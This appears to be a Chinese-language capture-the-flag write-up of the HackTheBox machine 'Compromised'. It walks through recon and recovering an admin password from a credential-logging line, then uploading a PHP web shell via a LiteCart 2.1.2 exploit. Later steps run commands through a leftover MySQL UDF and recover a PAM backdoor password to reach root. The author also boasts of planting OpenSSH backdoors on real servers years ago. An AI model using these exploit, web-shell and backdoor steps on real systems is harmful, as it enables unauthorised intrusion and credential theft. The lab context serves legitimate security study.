image-20200918234403355

整个机器都围绕着compromised设计,所以会发现root的first blood比user的first blood还早,有着非预期解法(?)

recon:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-16 08:45 EDT
Nmap scan report for compromised.htb (10.129.12.43)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
| 256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_ 256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.94 seconds

又是一个从web入口的机器。常规扫描目录一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ gobuster dir -u http://compromised.htb/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 30
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://compromised.htb/
[+] Threads: 30
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/18 11:50:11 Starting gobuster
===============================================================
/shop (Status: 301)
/backup (Status: 301)
Progress: 66340 / 207644 (31.95%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/09/18 11:50:32 Finished
===============================================================

shop是LiteCart 2.1.2版本的网站,谷歌一下发现有漏洞,但是需要登录,看backup目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ curl compromised.htb/backup/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /backup</title>
</head>
<body>
<h1>Index of /backup</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/compressed.gif" alt="[ ]"></td><td><a href="a.tar.gz">a.tar.gz</a></td><td align="right">2020-09-03 11:51 </td><td align="right">4.4M</td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at compromised.htb Port 80</address>
</body></html>

a.tar.gz下载下来是网站源码,解压出来找了下没有后门,在 admin/login.php里找到一句注释掉了的代码(呼应compromised主题次数:1):

1
//file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
1
2
3
# root @ kali in ~/hackthebox/machines/compromised/shop/admin [11:55:13] 
$ curl http://compromised.htb/shop/admin/.log2301c9430d8593ae.txt
User: admin Passwd: theNextGenSt0r3!~

登录用exp就能getshell了,稍微改了下exp,上传蚁剑能用的一句话

1
2
3
4
5
6
7
$ searchsploit litecart
------------------------------------------------------------------------------------------ ------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------ ------------------------------
LiteCart 2.1.2 - Arbitrary File Upload | php/webapps/45267.py
------------------------------------------------------------------------------------------ ------------------------------
Shellcodes: No Results
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# root @ kali in ~/hackthebox/machines/compromised [11:58:18] C:130
$ python2 exp.py -t http://compromised.htb/shop/admin/ -u admin -p theNextGenSt0r3\!~
http://compromised.htb/shop/admin/../vqmod/xml/3ROX9.php
Shell => http://compromised.htb/shop/admin/../vqmod/xml/3ROX9.php?c=id

# root @ kali in ~/hackthebox/machines/compromised [11:58:24]
$ curl -I http://compromised.htb/shop/admin/../vqmod/xml/3ROX9.php
HTTP/1.1 200 OK
Date: Fri, 18 Sep 2020 15:58:30 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Type: text/html; charset=UTF-8

# root @ kali in ~/hackthebox/machines/compromised [11:58:56] C:2
$ curl http://compromised.htb/shop/admin/../vqmod/xml/3ROX9.php -d "pass=echo 'asdfasdf';"
asdfasdf

这里可能本来是要考php bypass disable_functions的,但是实际上不用,但是还是放上来:https://www.exploit-db.com/exploits/48072

蚁剑连接之后到处翻,最后在mysql数据库里mysql.func里找到被其他黑客留下来的udf(呼应compromised主题次数:2):

image-20200919000432861

image-20200919000535291

这个exec_cmd只会返回执行结果的最后一行,可以在执行的命令后面拼接|base64 -w 0,得到一行base64的返回值,然后自己再base64 -d解码一下。但是返回字符数还是有限制,可以用head 和tail来截取第几行到第几行的输出

这里正常流程应该是写ssh公钥到mysql主目录下的.ssh/authorized_keys里然后ssh上去获得一个正常的shell,但是仍然不是必须的:

image-20200919001915931

这个密码可以用来登陆另外一个sysadmin用户

1
2
3
4
5
6
7
$ ssh sysadmin@compromised.htb
sysadmin@compromised.htb's password:
Last login: Fri Sep 18 16:20:20 2020 from 10.10.14.41
sysadmin@compromised:~$ whoami
sysadmin
sysadmin@compromised:~$ wc -c user.txt
33 user.txt

不过其实可以直接从mysql到root:

查看前面记录到的管理员账号密码的文件创建日期:

image-20200919003157382

查看在五月29号之后创建的文件(呼应compromised主题次数:3):

image-20200919003319304

回想起1415年在各大服务器上装openssh后门的时候了,过两年再黑进去还能在/var/log下面找到.ilog.olog文件,里面的账号密码还是新鲜的。

吹完牛回到正题,这种pam后门拉回本地反汇编一下就知道了:

image-20200919005055066

非常明显的后门,hex转ascii之后拼接一下,注意大小端问题就可以了,因为openssh没有开启pam验证,所以无法用这个密码去登陆ssh,但是可以用mysql登陆之后再用这个密码su到root:

1
2
3
4
5
6
7
8
9
$ ssh -i key mysql@compromised.htb
Last login: Thu Sep 3 11:52:44 2020 from 10.10.14.2
mysql@compromised:~$ su
Password:
root@compromised:/var/lib/mysql# wc -c /root/root.txt
33 /root/root.txt
root@compromised:/var/lib/mysql# hostname
compromised
root@compromised:/var/lib/mysql#